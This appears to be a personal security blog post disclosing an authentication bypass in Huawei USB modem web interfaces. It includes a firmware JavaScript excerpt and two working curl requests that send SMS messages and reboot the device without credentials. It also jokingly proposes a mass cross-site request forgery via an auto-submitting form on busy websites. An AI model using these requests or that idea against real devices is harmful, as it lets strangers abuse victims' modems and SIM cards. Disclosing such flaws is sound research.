Huawei Modems Authentication Bypass



huawei logo

I own a couple of Huawei USB modems, a Huawei E587 and a Huawei E355, while the first one is great for high speed mobile connections due to its dual channel feature, the E355 is a good choice for a small, easy to use and connect ( cdc_ether baby! ) mobile device.

But are they safe? … of course NOT :D

Many other researchers reported a few vulnerabilities on some specific devices, but actually the same vulnerability, the authentication bypass, applies for every device having the Huawei WebUI if you use their API url instead of the specific html form of the device model itself.

Most of the html forms inside the web ui, which are “protected” by a username and passsword ( default admin:admin, change it! ), just perform an AJAX request to the real API url, for instance:

/js/sms.js from E355 WebUI v11.011.04.00.625

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
....
....
saveAjaxData("api/sms/send-sms", submitData, function($xml) {
//-------------------------------------------------------------------
function getSendSmsStatus() {
getAjaxData("api/sms/send-status", function($xml) {
var ret = xml2object($xml);
ret = ret.response;
var sendTotalCount = ret.TotalCount;
var currentSendIndex = ret.CurIndex;
var currentSendPhone = ret.Phone;
var sendSuccessPhones = ret.SucPhone;
var sendFailPhones = ret.FailPhone;
var statusContent = sms_hint_sending + " " + currentSendIndex + "/" + sendTotalCount;
....
....

As you might have already guessed, those urls which are all starting with /api/ are not password protected whatsoever, for instance if you try the following (while you’re using your Huawei device and you have a SIM card in it):

curl "http://192.168.1.1/api/sms/send-sms" --data '<?xml version="1.0" encoding="UTF-8"?><request><Index>-1</Index><Phones><Phone>XXXXXXXXXX</Phone></Phones><Sca></Sca><Content>test</Content><Length>4</Length><Reserved>1</Reserved><Date>2015-02-01 14:02:26</Date></request>'

where XXXXXXXXXX would be your phone number, you’ll get a “test” sms from that device.

Or for instance, you could just reboot the device itself without being authenticated to it:

curl "http://192.168.1.1/api/device/control" --data '<?xml version="1.0" encoding="UTF-8"?><request><Control>1</Control></request>'

Imagine to put an auto-submit javascript-generated form inside an high traffic website :D

evil laugh

The firmware and webui are now for you to explore, you can find quite nice stuff in there if you know where to look at ;)